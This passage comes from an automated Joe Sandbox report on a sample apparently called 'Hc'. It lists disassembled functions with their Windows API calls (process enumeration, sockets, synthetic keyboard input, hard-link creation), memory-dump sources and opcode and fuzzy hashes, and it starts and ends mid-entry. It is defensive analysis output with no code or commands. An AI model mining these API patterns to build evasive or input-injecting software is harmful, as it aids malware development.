                                                                  • Instruction ID: 39cb6037ae3ff88c92d847593a73efe1cb2585b9e57f5b3d003a93297b396755
                                                                  • Opcode Fuzzy Hash: 162267fbd27936e68a0429aecbff850eceac01865837bcf0a60496ea90005d8a
                                                                  • Instruction Fuzzy Hash: 9BF05EF2545315BFE3106B60AC46FB73E9EEB05350F411021BB08DA5A2EE764C40C3B9
                                                                  Function 0067E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0067E797
                                                                  • FreeLibrary.KERNEL32 ref: 0067E7BD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: GetSystemWow64DirectoryW$X64
                                                                  • API String ID: 3013587201-2590602151
                                                                  • Opcode ID: 6b7742ba4184e79b767304030b4cbf30b1f4c14dd5d04f3e8d828a6e340bfd29
                                                                  • Instruction ID: a11a275fe6e3c158e4220bc47c0afac1c3997e190cc0817b0328ea2294abc8bc
                                                                  • Opcode Fuzzy Hash: 6b7742ba4184e79b767304030b4cbf30b1f4c14dd5d04f3e8d828a6e340bfd29
                                                                  • Instruction Fuzzy Hash: DCF02BB1C026159FD7355B244C84EAA371B6F14B00F1145E4E809FF151FB31CD89C794
                                                                  Function 0068096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 02d60be94a82db8d54981ad6fbcab163a03ea646e5505c31b12f0c39bb08fb7e
                                                                  • Instruction ID: c5e93854f029e913a3b9a1ec988168c541f97786ac4a40b134d4ade10a8bd3b2
                                                                  • Opcode Fuzzy Hash: 02d60be94a82db8d54981ad6fbcab163a03ea646e5505c31b12f0c39bb08fb7e
                                                                  • Instruction Fuzzy Hash: 45C17075A00206EFEB54DF94C894EAEB7B6FF48704F108A98E505EB251D731EE85CB90
                                                                  Function 006541F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: __alldvrm$_strrchr
                                                                  • String ID:
                                                                  • API String ID: 1036877536-0
                                                                  • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                  • Instruction ID: 88789ed7499252ffbd1dd00be6bdf012993c405a7d44af1038600537fa4c26c9
                                                                  • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                  • Instruction Fuzzy Hash: 90A178729403869FDB21CF19C8917EEBBE2EF11319F1441EDED959B381CA38898AC750
                                                                  Function 00680D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,006C0BD4,?), ref: 00680EE0
                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,006C0BD4,?), ref: 00680EF8
                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,006BDCE0,000000FF,?,00000000,00000800,00000000,?,006C0BD4,?), ref: 00680F1D
                                                                  • _memcmp.LIBVCRUNTIME ref: 00680F3E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                  • String ID:
                                                                  • API String ID: 314563124-0
                                                                  • Opcode ID: 24d17bcb98d0d338f495abde287b43a8e41d022fdb7fda3bf38ead7d6343b834
                                                                  • Instruction ID: 65890f6c6ea47beaf82ea897bd3553c2612d15bf3c971ca064bbf9520684a67e
                                                                  • Opcode Fuzzy Hash: 24d17bcb98d0d338f495abde287b43a8e41d022fdb7fda3bf38ead7d6343b834
                                                                  • Instruction Fuzzy Hash: 32812D71A00109EFDB54DF94C984DEEB7BAFF89315F204558F506AB250DB71AE0ACB60
                                                                  Function 006AB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 006AB10C
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 006AB11A
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 006AB1FC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006AB20B
                                                                    • Part of subcall function 0063E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00664D73,?), ref: 0063E395
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                  • String ID:
                                                                  • API String ID: 1991900642-0
                                                                  • Opcode ID: a140684bb16d7211aed1d817da79c52aeffb9de211580223a39cf7e87f71aba7
                                                                  • Instruction ID: 44438bcc2c24ac7dd78498fd364c3133213d04491e9748994130e762f8ad5cf7
                                                                  • Opcode Fuzzy Hash: a140684bb16d7211aed1d817da79c52aeffb9de211580223a39cf7e87f71aba7
                                                                  • Instruction Fuzzy Hash: 53518BB1508710AFD350EF24D886A6BBBE9FF89754F00892DF58597252EB30E904CF96
                                                                  Function 00661711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _free
                                                                  • String ID:
                                                                  • API String ID: 269201875-0
                                                                  • Opcode ID: edf569a9993d500ef3ed1ea62fe59dc587a237cfb74001e4498142a11a84ef1b
                                                                  • Instruction ID: 03281060cb3b981b4a7b3b03b80eaef8bb53e4e147f84544fb00e5be657edc3e
                                                                  • Opcode Fuzzy Hash: edf569a9993d500ef3ed1ea62fe59dc587a237cfb74001e4498142a11a84ef1b
                                                                  • Instruction Fuzzy Hash: FF412B31A00100ABDB61BFBD8C46ABE3AA7EF47330F1C062DF814DF2A1D6358C4156A5
                                                                  Function 006A2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 006A255A
                                                                  • WSAGetLastError.WSOCK32 ref: 006A2568
                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006A25E7
                                                                  • WSAGetLastError.WSOCK32 ref: 006A25F1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$socket
                                                                  • String ID:
                                                                  • API String ID: 1881357543-0
                                                                  • Opcode ID: 1c50b2874bf6ccef610d00f830fc83cbca7e1d950b62e82764457f3875a96287
                                                                  • Instruction ID: 20ba20bd4f84f207fdef9fec3a5bd89c52ec820d28a9a923cc5e13804c14b96f
                                                                  • Opcode Fuzzy Hash: 1c50b2874bf6ccef610d00f830fc83cbca7e1d950b62e82764457f3875a96287
                                                                  • Instruction Fuzzy Hash: 1541D274A40211AFE720AF24D896F6637E6AB05718F54C45CF9198F3D2D772ED428B90
                                                                  Function 006B6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 006B6D1A
                                                                  • ScreenToClient.USER32(?,?), ref: 006B6D4D
                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 006B6DBA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  • API String ID: 3880355969-0
                                                                  • Opcode ID: 648495888b6c883abc6186537012d7b7084e892dba3392039d5c87c59723a704
                                                                  • Instruction ID: c6704179d5b9cca7f7418fe21ca677a0f75e808dde098c50e10bf2edad119e35
                                                                  • Opcode Fuzzy Hash: 648495888b6c883abc6186537012d7b7084e892dba3392039d5c87c59723a704
                                                                  • Instruction Fuzzy Hash: 5351E6B5A00209AFCB25DF68D8819EE7BA6EF44360F208559F9159B3A0D774AE81CB50
                                                                  Function 0065B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5335eda609e62f61a9dedc757b4dee91756a0807334618150617b698d41a71b
                                                                  • Instruction ID: 95cbf478b53b40edc6a77912d288ee1fe3dbea1f04f3645c422ef6b906cc24e9
                                                                  • Opcode Fuzzy Hash: e5335eda609e62f61a9dedc757b4dee91756a0807334618150617b698d41a71b
                                                                  • Instruction Fuzzy Hash: 6A412B71A00704AFD724AF78CC51BAABBEFEF88711F10952EF511DB291D771A9058784
                                                                  Function 0069611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006961C8
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 006961EE
                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00696213
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0069623F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 3321077145-0
                                                                  • Opcode ID: b8aaeb87a88bb576c759ad4cee9860c350ad3af11dd15e0db3f3ea38e97f2ac0
                                                                  • Instruction ID: d00dd6c1af16703a925b18c72f1ccceeda07d99511acf6548009341533dfcf64
                                                                  • Opcode Fuzzy Hash: b8aaeb87a88bb576c759ad4cee9860c350ad3af11dd15e0db3f3ea38e97f2ac0
                                                                  • Instruction Fuzzy Hash: 7B411A35600A20DFCB51EF14C545A59BBE7AF89720B198498E84A9B3A2CB31FD41CF95
                                                                  Function 0068B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0068B473
                                                                  • SetKeyboardState.USER32(00000080), ref: 0068B48F
                                                                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0068B4FD
                                                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0068B54F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 44462a9c92346d7522c5707ded21af50f671abb7b34a4e7ea23c9c12aeed3127
                                                                  • Instruction ID: d8f3e900ecf90bc40e19351050cef8604337e505211b4b685c1f10ba3ba95b10
                                                                  • Opcode Fuzzy Hash: 44462a9c92346d7522c5707ded21af50f671abb7b34a4e7ea23c9c12aeed3127
                                                                  • Instruction Fuzzy Hash: 7B314B70A406086EFF30EF6488067FE7BB7AB48310F04631AE495562D6D77499868766
                                                                  Function 0068B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0068B5B8
                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 0068B5D4
                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 0068B63B
                                                                  • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0068B68D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 610c48a8cd36c3df3930b975f4a2fb3870296a84c3ad6e45024d4d8de28d7cfa
                                                                  • Instruction ID: 89f01c096c679cf5b77472fd42af07f20e237ea73652a69b1290dd48db00e50f
                                                                  • Opcode Fuzzy Hash: 610c48a8cd36c3df3930b975f4a2fb3870296a84c3ad6e45024d4d8de28d7cfa
                                                                  • Instruction Fuzzy Hash: 13313C70D40608AEFF30AB6488157FE7BA7EF89310F04532AE485562D1E7748AC68BA5
                                                                  Function 006B80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 006B80D4
                                                                  • GetWindowRect.USER32(?,?), ref: 006B814A
                                                                  • PtInRect.USER32(?,?,?), ref: 006B815A
                                                                  • MessageBeep.USER32(00000000), ref: 006B81C6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: bb5fddd39401e0c76ea72177d5070a9f771d3bd0cf59b5335c82263084e19e3d
                                                                  • Instruction ID: 507949c4570ddde063da6db88c14bc7fd5a681445c454f20ff48e463b834f65b
                                                                  • Opcode Fuzzy Hash: bb5fddd39401e0c76ea72177d5070a9f771d3bd0cf59b5335c82263084e19e3d
                                                                  • Instruction Fuzzy Hash: 65417EB0A02216DFCB15CF5DC895AE9B7FABB45314F1441A8E9549F362CB70A883CF90
                                                                  Function 006B2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 006B2187
                                                                    • Part of subcall function 00684393: GetWindowThreadProcessId.USER32(?,00000000), ref: 006843AD
                                                                    • Part of subcall function 00684393: GetCurrentThreadId.KERNEL32 ref: 006843B4
                                                                    • Part of subcall function 00684393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00682F00), ref: 006843BB
                                                                  • GetCaretPos.USER32(?), ref: 006B219B
                                                                  • ClientToScreen.USER32(00000000,?), ref: 006B21E8
                                                                  • GetForegroundWindow.USER32 ref: 006B21EE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  • Opcode ID: 778e0d3ee82fa24a87e99cc47a3e6a456a2834cfa806aa0a3d90f067b81facc9
                                                                  • Instruction ID: fdc5cc5fe2d491eeaca55724c90cf2abd6e75b5a52334dadf996c3e3ae6954c0
                                                                  • Opcode Fuzzy Hash: 778e0d3ee82fa24a87e99cc47a3e6a456a2834cfa806aa0a3d90f067b81facc9
                                                                  • Instruction Fuzzy Hash: 823130B1D01519AFCB44EFA9C881CEEBBF9EF48304B50846AE515E7211DA719E45CFA0
                                                                  Function 0068E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006241EA: _wcslen.LIBCMT ref: 006241EF
                                                                  • _wcslen.LIBCMT ref: 0068E8E2
                                                                  • _wcslen.LIBCMT ref: 0068E8F9
                                                                  • _wcslen.LIBCMT ref: 0068E924
                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0068E92F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$ExtentPoint32Text
                                                                  • String ID:
                                                                  • API String ID: 3763101759-0
                                                                  • Opcode ID: 7168dea3642497a40275b9cd9d8b17b5191b4a83d354595930101d799905d02c
                                                                  • Instruction ID: 9ef2ca965ac143ed3c9d377f8da4cb78237a51020e16a0919f3dc5d135c2be69
                                                                  • Opcode Fuzzy Hash: 7168dea3642497a40275b9cd9d8b17b5191b4a83d354595930101d799905d02c
                                                                  • Instruction Fuzzy Hash: C021F7B1D00224EFDB50AFA4D982BEEB7FAEF45310F154169E804BB341DA709E41CBA5
                                                                  Function 0068DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?,006BDC30), ref: 0068DBA6
                                                                  • GetLastError.KERNEL32 ref: 0068DBB5
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0068DBC4
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,006BDC30), ref: 0068DC21
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 2267087916-0
                                                                  • Opcode ID: 16bae022074c54ad15f5bc18659737c51fe1fd70e10fb9027ad86979a3b6e447
